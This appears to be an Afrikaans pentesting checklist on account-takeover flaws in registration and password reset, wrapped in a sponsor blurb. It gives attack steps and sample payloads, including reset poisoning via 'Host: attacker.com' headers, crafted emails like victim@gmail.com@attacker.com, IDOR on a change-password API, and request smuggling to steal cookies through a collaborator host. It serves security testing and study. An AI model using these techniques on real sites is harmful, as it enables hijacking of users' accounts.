Registration & Takeover Vulnerabilities
WhiteIntel is 'n donker-web aangedrewe soekenjin wat gratis funksies bied om te kontroleer of 'n maatskappy of sy kliënte deur steel-malware is gekompromiteer.
Hul primêre doel van WhiteIntel is om rekeningoorname en losprysaanvalle te beveg wat voortspruit uit inligtingsteel-malware.
Jy kan hul webwerf besoek en hul enjin gratis probeer by:
Registrasie Oorname
Duplikaat Registrasie
Probeer om te genereer met 'n bestaande gebruikersnaam
Kontroleer variasie in die e-pos:
hoofletters
+1@
voeg 'n paar punte by in die e-pos
spesiale karakters in die e-posnaam (%00, %09, %20)
Plaas swart karakters na die e-pos:
test@test.com a
victim@gmail.com@attacker.com
victim@attacker.com@gmail.com
Gebruikersnaam Enumerasie
Kyk of jy kan uitfigure wanneer 'n gebruikersnaam reeds geregistreer is binne die aansoek.
Wagwoordbeleid
Skep 'n gebruiker en kyk na die wagwoordbeleid (kyk of jy swak wagwoorde kan gebruik). In daardie geval kan jy probeer om geloofsbriewe te bruteforce.
SQL Injeksie
Kyk na hierdie bladsy om te leer hoe om rekeningoorname te probeer of inligting te onttrek via SQL Injeksies in registrasievorms.
Oauth Oorname
pageOAuth to Account takeoverSAML Kwesbaarhede
pageSAML AttacksVerander E-pos
Wanneer geregistreer, probeer om die e-pos te verander en kyk of hierdie verandering korrek gevalideer word of dit na willekeurige e-posse kan verander.
Meer Kontroles
Kyk of jy weggooi-e-posse kan gebruik
Lang wagwoord (>200) lei tot DoS
Kyk na tempo-limiete op rekening-skepping
Gebruik username@burp_collab.net en analiseer die terugroep
Wagwoord Herstel Oorname
Wagwoord Herstel Token Lek via Verwysing
Versoek wagwoordherstel na jou e-posadres
Klik op die wagwoordherstel skakel
Verander nie wagwoord nie
Klik op enige 3de party webwerwe (bv: Facebook, twitter)
Onderskep die versoek in Burp Suite proxy
Kyk of die verwysingskop wagwoordherstel-token lek.
Wagwoord Herstel Vergiftiging
Onderskep die wagwoordherstel versoek in Burp Suite
Voeg of wysig die volgende koppe in Burp Suite by:
Host: attacker.com
,X-Forwarded-Host: attacker.com
Stuur die versoek met die gewysigde kop
http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com
Soek na 'n wagwoordherstel-URL gebaseer op die host-kop soos:
https://attacker.com/reset-password.php?token=TOKEN
Wagwoord Herstel Via E-pos Parameter
IDOR op API-parameters
Aanvaller moet inlog met hul rekening en na die Wagwoord verander-funksie gaan.
Begin die Burp Suite en onderskep die versoek.
Stuur dit na die herhalingskategorie en wysig die parameters: Gebruiker-ID/e-pos
powershell POST /api/changepass [...] ("vorm": {"e-pos":"slagoffer@e-pos.com","wagwoord":"veilige wagwoord"})
Swak Wagwoord-herstelteken
Die wagwoord-herstelteken moet ewekansig gegenereer en uniek wees elke keer. Probeer bepaal of die teken verval of altyd dieselfde is, in sommige gevalle is die genereringsalgoritme swak en kan geraden word. Die volgende veranderlikes kan deur die algoritme gebruik word.
Tydstempel
Gebruiker-ID
E-pos van Gebruiker
Voornaam en Van
Geboortedatum
Kriptografie
Slegs nommer
Klein tekenreeks (karakters tussen [A-Z,a-z,0-9])
Tekenhergebruik
Tekenvervaldatum
Uitlek van Wagwoord-herstelteken
Trigger 'n wagwoord-herstelversoek deur die API/UI vir 'n spesifieke e-pos bv: toets@pos.com
Inspekteer die bedienerreaksie en soek na
resetToken
Gebruik dan die teken in 'n URL soos
https://voorbeeld.com/v3/gebruiker/wagwoord/herstel?resetToken=[DIE_RESET_TEKEN]&e-pos=[DIE_POS]
Wagwoord-herstel via Gebruikersnaam-botsing
Registreer op die stelsel met 'n gebruikersnaam identies aan die slagoffer se gebruikersnaam, maar met spasies ingevoeg voor en/of na die gebruikersnaam. bv:
"admin "
Vra 'n wagwoordherstel met jou skadelike gebruikersnaam aan.
Gebruik die teken wat na jou e-pos gestuur is en herstel die slagoffer se wagwoord.
Koppel aan die slagoffer se rekening met die nuwe wagwoord.
Die platform CTFd was vatbaar vir hierdie aanval. Sien: CVE-2020-7245
Rekening-oorneem via Kruissite-skripsing
Vind 'n Kruissite-skripsing binne die aansoek of 'n subdomein as die koekies toegespits is op die ouer domein:
*.domein.com
Laat die huidige sessiekoekie uitlek.
Verifieer as die gebruiker deur die koekie.
Rekening-oorneem via HTTP-versoeksmokkel
1. Gebruik smuggler om die tipe HTTP-versoeksmokkeling (CL, TE, CL.TE) op te spoor
powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h
2. Stel 'n versoek op wat die POST / HTTP/1.1
sal oorskryf met die volgende data:
GET http://iets.burpcollaborator.net HTTP/1.1 X:
met die doel om die slagoffers na burpcollab te oopverwys en hul koekies te steel
3. Die finale versoek kan so lyk:
Hackerone-rapporteerders wat hierdie fout uitgebuit het * https://hackerone.com/reports/737140 * https://hackerone.com/reports/771666
Rekening-oorneem deur CSRF
Skep 'n lading vir die CSRF, bv: "HTML-vorm met outomatiese indiening vir 'n wagwoordverandering"
Stuur die lading
Rekening-oorneem deur JWT
JSON Web Token kan gebruik word om 'n gebruiker te verifieer.
Wysig die JWT met 'n ander Gebruiker-ID / E-pos
Kontroleer vir swak JWT-handtekening
Verwysings
WhiteIntel is 'n donkerweb-aangedrewe soekenjin wat gratis funksies bied om te kontroleer of 'n maatskappy of sy kliënte deur diewe-malware gekompromitteer is.
Die primêre doel van WhiteIntel is om rekening-oorneem en lospryse-aanvalle te bekamp wat voortspruit uit inligtingsteel-malware.
Jy kan hul webwerf besoek en hul enjin gratis probeer by:
Last updated